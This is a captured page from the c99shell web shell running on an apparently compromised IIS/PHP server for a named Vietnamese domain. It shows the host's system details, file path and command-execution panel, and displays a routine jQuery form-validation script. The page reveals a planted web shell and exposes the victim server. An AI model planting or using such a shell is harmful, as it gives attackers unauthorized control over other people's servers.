Software: Microsoft-IIS/10.0. PHP/7.4.33 uname -a: Windows NT LAKE 10.0 build 20348 (Windows Server 2016) AMD64 IWPD_801(traduongco) Safe-mode: OFF (not secure) D:\vhosts\traduong.com.vn\admin.traduong.com.vn\Content\admin\assets\es6\pages\ drwxrwxrwx | |
| Viewing file: Select action/file-type: class FormValidation {
static init() {
$( "#form-validation" ).validate({
ignore: ':hidden:not(:checkbox)',
errorElement: 'div',
errorClass: 'is-invalid',
validClass: 'is-valid',
rules: {
inputRequired: {
required: true
},
inputMinLength: {
required: true,
minlength: 6
},
inputMaxLength: {
required: true,
minlength: 8
},
inputUrl: {
required: true,
url: true
},
inputRangeLength: {
required: true,
rangelength: [2, 6]
},
inputMinValue: {
required: true,
min: 8
},
inputMaxValue: {
required: true,
max: 6
},
inputRangeValue: {
required: true,
max: 6,
range: [6, 12]
},
inputEmail: {
required: true,
email: true
},
inputPassword: {
required: true
},
inputPasswordConfirm: {
required: true,
equalTo: '#password'
},
inputDigit: {
required: true,
digits: true
},
inputValidCheckbox: {
required: true
}
}
});
}
}
$(() => { FormValidation.init(); });
|
:: Command execute :: | |
--[ c99shell v. 2.1 [PHP 8 Update] [02.02.2022] maintained byC99Shell Github | Generation time: 0.9555 ]-- |